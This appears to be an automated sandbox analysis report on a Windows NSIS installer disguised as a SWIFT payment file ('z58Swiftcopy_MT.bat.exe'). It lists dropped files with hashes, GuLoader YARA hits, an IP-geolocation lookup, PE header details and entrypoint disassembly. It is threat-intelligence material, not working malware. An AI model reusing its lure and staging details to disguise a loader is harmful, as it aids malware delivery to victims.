                                                                                                                                                                                                                                    Preview:{. "geoplugin_request":"185.246.209.154",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Chicago",. "geoplugin_region":"Illinois",. "geoplugin_regionCode":"IL",. "geoplugin_regionName":"Illinois",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"602",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"41.871",. "geoplugin_longitude":"-87.6289",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):295063
                                                                                                                                                                                                                                    Entropy (8bit):7.644482175354666
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6144:8lhRMF3vOZjQKTUTDlWKY8Q+7T0oXvtFecJpwfFRWUEj2:8Nc3viuD8H89H0cDecJ4RWUEa
                                                                                                                                                                                                                                    MD5:0C64C6AD5E6D9DC0871FE1A8C4CC04FA
                                                                                                                                                                                                                                    SHA1:886C9CA43763723A11E783223BA019513272F984
                                                                                                                                                                                                                                    SHA-256:1B756A1D8819907BBA34B116F01FB92BC5FBF1A833635CD6401E9AC4F10EFEA2
                                                                                                                                                                                                                                    SHA-512:25E5A279BDEF2BDB15B068D590B3DD372479E67D1B7EEFD02CB8ECEF4C7C567939BBADFD43F657DE37431A8FAA6EC252A6AB114BFD196B1ED184553591D29D10
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Objektsprogs.Jrg119, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:...FFF..+......==......................U...``...777.....h.}}........||.....:::.ee...............b..e....[[..555..OOO.:.....######......4.....-........<<<.............T.nn..ZZZ.......SS.aaa.......G.....I..........rrr.......E..........m......J...........}}}...-.........0..@.....................................j............ZZZ...................jj....................H................................................^^..........,,............%%%..............J.......ccc...888.....2....'.....LL.........................ss.......vv....~~~.........====..K.......S.W........../................B..:.888.KK..M...F.kk....f..l.........EE...o.}.....xx............T......;...??........:.k...........YY..t.---.-.....W......T.}}.......................................^..........[[.....NNN...................P............ZZZ.........................vvvv...............E.:.........**.........$....G............T..............L....2.................................dd...................3....S.......... ...j........

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Rundskaalers\Biri.skr

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):126219
                                                                                                                                                                                                                                    Entropy (8bit):1.2476140630029537
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:ypw+1R1HmrJqSpqHt8wu/Uc8A82XMK80Wnseb5duoe2njOg5X/G7:yEpmwKm
                                                                                                                                                                                                                                    MD5:BE1AEA45CD04BE1806BE5777F6529ECE
                                                                                                                                                                                                                                    SHA1:B3E4893ADB16D8677032B9B8C3B419FB6F9040D2
                                                                                                                                                                                                                                    SHA-256:34DDE02E575CF514C32DF1108FB8D83E22831B5A13733793C7B00C1B119320DE
                                                                                                                                                                                                                                    SHA-512:9649E9AB3AB9C3290E118E4E8F4354B067259B96E06753E9F1EC97AD4A5A41EE3438411D0166B7F390EA41489629D8338AF00FAB7964C5C91EEDE4978AFC7FC8
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:......@.......................................................=...................................J..............................................................+...v....U......S...+)..........................................................l...........................7.......l.h..................H...^...<....................................................8..................................................v..............................._..............X....>...................{...H.......................h.........................................[.............................Rh... ..................6..............................................^............................................u....a............T......|}............................................~..............S......v.........................................u......................................................................../.................................................l............................>..........3..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Rundskaalers\Skyllende.Rei

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) \233, numeric, rows 5376, columns 0, imaginary
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):114357
                                                                                                                                                                                                                                    Entropy (8bit):4.581842620745206
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:O+uWUcEcdeZGLztlmGkJRPF9qHUziwsvm7jvKLPubEGgNRCT3JuvD2AXRY1xo9DV:b/bwstl7EdYHdwr72zKaCZuxSA9DV
                                                                                                                                                                                                                                    MD5:CA8C7BC5806A696930B9F4195B6DD4A1
                                                                                                                                                                                                                                    SHA1:E7F93E666F8428FB51D2B5DEEC20BFCD6292A524
                                                                                                                                                                                                                                    SHA-256:E2CAB223B5AE152BF8BCE3F995D45A1412F3F4B63F15A65F62B9DDBC234605AC
                                                                                                                                                                                                                                    SHA-512:7F2CB68FA4B545845A1BD3A813C51B01286F4F3A3532669317D47463289699E1C605A18AF719C9CF5046A3CC47337F1F069CEA90406342D84FDF618DF23AF4A2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:............6.....(...T....................................;.. .........vv...-..............................ccccccc...x...........................h.........""""................{{{......#.....--..................77.JJ......................U....OO.......j..............!!............;..........f......................AAAA..;;................V.II...........RR......................<<<<<.VV..zz......\...{{{.............1..............000......4........'....&.....ee.......&....-.............IIIIII......t..........]]].......m.....mmmm.....UUUU............ll............z................Z....b............oo......,,,,............m.......7.9........................r....?.........H./..u.."".......u.............?.....................J."...............88............eee.......|...O.%%%.......zz....................T..i....<............S......U......{........$.............!.w.....%%.....i..............................................,,.........................X....T...rrr.....P..........m.......[.......c

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\Rundskaalers\cambalo.inh

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):37896
                                                                                                                                                                                                                                    Entropy (8bit):1.200616357643719
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:GGByFFg5xUFtU4WnCLunXiPBK+34PvQ27JnTpFsxxa:GGByFFg5xU/U4WsunXiE+3gvQ2fFsxxa
                                                                                                                                                                                                                                    MD5:0B216F5A8151B9C6EB9AD7F89A9BC030
                                                                                                                                                                                                                                    SHA1:3F34D9DFA023843C1B66155ADD4E5C311F07DCA0
                                                                                                                                                                                                                                    SHA-256:FD8DE6BF1B5A69687911C500A12D5BA3092569611844CDED241563AB9E611A32
                                                                                                                                                                                                                                    SHA-512:EFB2C8919AF7A0D618085DF35557CDAA59C350FDFE617A5F18BFA449AD09B105DC3CA8F4467C69763CD2AEBB376F8122FF7116B9D3DE85391E3462C2FD59966A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.....J...................T......H......].....j..........@..............................?................................}.................................,.F...............n...............................*.....................a..........................................................................2......................................................................,.............................................._{.......................................t...................V.............................................V..............................................................;..........................}...]6..........O........T........oz.......................................................................cb.................................................................}b....................................i...........................................e.....&........................p..........................................................6..#................P.................

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne\oink.tyk

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):214335
                                                                                                                                                                                                                                    Entropy (8bit):1.2476323095361204
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:99C7iXwL7CwdtIlUUoJOtkhmD6bddfwlR6eng3tDfGXU41X8Kbfjl+f7KoZ3pkmY:eiRa7POSx67/L
                                                                                                                                                                                                                                    MD5:59874EF8405969406DE4B3A1C90793D4
                                                                                                                                                                                                                                    SHA1:C3A8B546FA78D9218E8355756B12921E6419E69E
                                                                                                                                                                                                                                    SHA-256:24F7B3739548CFA16CB005CD467F26C369EBCA40B4867C197BF4A90DD8939079
                                                                                                                                                                                                                                    SHA-512:F6BC59CC92DD6660662193A49D2C1023DC42141948E9361CB6FA122BA796FE2175C9A3CF68F4318BA728315DD1BCBAE0DB925C03D6EED8540C4FB5A961E7BEE9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.....................w.......].........................X..!.......p.....{................................t............................~...........................................j................................w..........L....................+.................................P...2T...........[.........................2..................................................................e...........................................................................P..............................}..........$..................................................... ....................................................................................M.............................................................a.......................................|..........=..............................................M.....!......g.........d................i...d...E................................................................................*..........................................................w.......

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\Setup.ini

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):25
                                                                                                                                                                                                                                    Entropy (8bit):4.0536606896881855
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                                                                                                                                                                                    MD5:08CA75DA54EB4810D18796C97F510A55
                                                                                                                                                                                                                                    SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                                                                                                                                                                                    SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                                                                                                                                                                                    SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[Bus Clock]..Gats=Galse..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\bhvD739.tmp

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb574f9db, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):41943040
                                                                                                                                                                                                                                    Entropy (8bit):1.414839785096139
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24576:KmzLCQZLtPb9Mk+M/aGyptmVjPDQgGEQg9jZkoiGsS7dID7ILJvCdau2u0lfoBg:XLN9lnaGyp6PDQgGT2u2
                                                                                                                                                                                                                                    MD5:0ACC78E34DB8E23FCBA8E429EC8B64E6
                                                                                                                                                                                                                                    SHA1:8623FC362C67D29D455CF957C70D57682EDD5B78
                                                                                                                                                                                                                                    SHA-256:EA0E9493CD20DEC887436323FC8C93855507CD77286A8ABB4AD646F604215D7C
                                                                                                                                                                                                                                    SHA-512:46095667ECB07CE94DD2EF3B15216D0B18CD9F8A13D7D5874F63E45051868941CFE0C4D5789F631B51D46639F0071921CB6A9FE1680E0517ADDD9B91413C3B33
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.t..... ........N...........*...y........................S.M........}7.#....}..h.U.M.........................Be ....y7.........................................................................................................bJ......n...............................................................M...M....................................... ............|..............................................................M...........................................................................................................................N...:....y!.................................|r(.#....}..................S.1.#....}..................M........#......h.U.M...................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\hqupnmxiqgofocirvgzrkof

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):11264
                                                                                                                                                                                                                                    Entropy (8bit):5.76781505116372
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:MPtkumJX7zBE2kGwfy9S9VkPsFQ1Mx1c:97O2k5q9wA1Mxa
                                                                                                                                                                                                                                    MD5:55A26D7800446F1373056064C64C3CE8
                                                                                                                                                                                                                                    SHA1:80256857E9A0A9C8897923B717F3435295A76002
                                                                                                                                                                                                                                    SHA-256:904FD5481D72F4E03B01A455F848DEDD095D0FB17E33608E0D849F5196FB6FF8
                                                                                                                                                                                                                                    SHA-512:04B8AB7A85C26F188C0A06F524488D6F2AC2884BF107C860C82E94AE12C3859F825133D78338FD2B594DFC48F7DC9888AE76FEE786C6252A5C77C88755128A5B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: asXlZG3aW6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: asXlZG3aW6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: aMfizaMilo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 1ppvR5VRT6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Ozb8aojWew.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: aMfizaMilo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: 1ppvR5VRT6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...R..Y...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..^....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsm9317.tmp

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):804513
                                                                                                                                                                                                                                    Entropy (8bit):4.681017650811177
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12288:WNc3viuD8H89H0cDecJ4RWUEhws7xCV3:WNcR8c9H0cCi4wZxc
                                                                                                                                                                                                                                    MD5:E92E312AA45B6F4DC479CCF07A3C0730
                                                                                                                                                                                                                                    SHA1:C353EFB4D39E6D86D0D0C37AC404CE88B1171E56
                                                                                                                                                                                                                                    SHA-256:CD0E3A223A1B369439FA863A0F560C727EFFDF2F49AF5CB15B8C010E3820A0FA
                                                                                                                                                                                                                                    SHA-512:236A946483347E735CBF1CF7008C40AD8D60009EA52D6644F7A3A8D8019C0A422CC3ED186948EB1FCD44D111982E69DF8B1823863E2D9B43AEBCDC9445FC1024
                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsm9317.tmp, Author: Joe Security
                                                                                                                                                                                                                                    Preview:........,...................X...d.......E...................................................................................................................................................................................................................................................J...Y...............j...............................................................................................................................k.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Entropy (8bit):7.960664613935639
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:z58Swiftcopy_MT.bat.exe
                                                                                                                                                                                                                                    File size:408'484 bytes
                                                                                                                                                                                                                                    MD5:d82fc35769adac8d6c49087219b1cd93
                                                                                                                                                                                                                                    SHA1:ff87686b1f399b3d68a580dc016e2c675b61d5c1
                                                                                                                                                                                                                                    SHA256:8da8762a0f3794de100bd1800856136928880e8a9d0be42eb758809bca1bd0e3
                                                                                                                                                                                                                                    SHA512:6df0e845cd1d85403ee6daf2b1c2b77aaa10729fa3fd650c2feaac1ab4e5710ac8a64ee86f91e531b91640badd3197a69e07cd35352b49b410b9c6cdbef90724
                                                                                                                                                                                                                                    SSDEEP:12288:cAi7YTKWB5q86Q50v5Qo1qksWrt1rBHSKJrxODw:cApmWJ6Q50vD1jB7hxIw
                                                                                                                                                                                                                                    TLSH:F79423827A80C4BBDF6586341DBBDE3663F07623110A190BA3E45BADB613CC6724B597
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...s..Y.................b.........

                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                    Icon Hash:3d2e0f95332b3399

                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Entrypoint:0x40330d
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x597FCC73 [Tue Aug 1 00:33:55 2017 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:57e98d9a5a72c8d7ad8fb7a6a58b3daf

                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    sub esp, 00000184h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebx
                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A130h
                                                                                                                                                                                                                                    mov dword ptr [esp+20h], ebx
                                                                                                                                                                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                                                                                                    call dword ptr [004080A4h]
                                                                                                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                                                                                    mov dword ptr [0042472Ch], eax
                                                                                                                                                                                                                                    je 00007FAAB0980BA3h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call 00007FAAB0983C72h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FAAB0980B99h
                                                                                                                                                                                                                                    push 00000C00h
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    mov esi, 00408298h
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call 00007FAAB0983BEEh
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call dword ptr [004080A0h]
                                                                                                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                    cmp byte ptr [esi], bl
                                                                                                                                                                                                                                    jne 00007FAAB0980B7Dh
                                                                                                                                                                                                                                    push 0000000Ah
                                                                                                                                                                                                                                    call 00007FAAB0983C46h
                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                    call 00007FAAB0983C3Fh
                                                                                                                                                                                                                                    push 00000006h
                                                                                                                                                                                                                                    mov dword ptr [00424724h], eax
                                                                                                                                                                                                                                    call 00007FAAB0983C33h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FAAB0980BA1h
                                                                                                                                                                                                                                    push 0000001Eh
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007FAAB0980B99h
                                                                                                                                                                                                                                    or byte ptr [0042472Fh], 00000040h
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call dword ptr [00408288h]
                                                                                                                                                                                                                                    mov dword ptr [004247F8h], eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                    push 00000160h
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push 0041FCF0h
                                                                                                                                                                                                                                    call dword ptr [00408178h]
                                                                                                                                                                                                                                    push 0040A1ECh

                                                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x84280xa0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000xa50.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x298.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x603c0x6200029c8031e2fb36630bb7ccb6d1d379b5False0.6572464923469388data6.39361655287636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x80000x12480x1400421f9404c16c75fa4bc7d37da19b3076False0.4287109375data5.044261339836676IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0xa0000x1a8380x400c93d53142ea782e156ddc6acebdf883dFalse0.6455078125data5.223134318413766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .ndata0x250000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x350000xa500xc001b99c5df5aaedc5b60aeacee8a24a0feFalse0.40234375data4.186971853013905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x351900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                                                                                                                    RT_DIALOG0x354780x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                    RT_DIALOG0x355780x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                    RT_DIALOG0x356980x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                    RT_GROUP_ICON0x356f80x14dataEnglishUnited States1.2
                                                                                                                                                                                                                                    RT_MANIFEST0x357100x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                    DLLImport
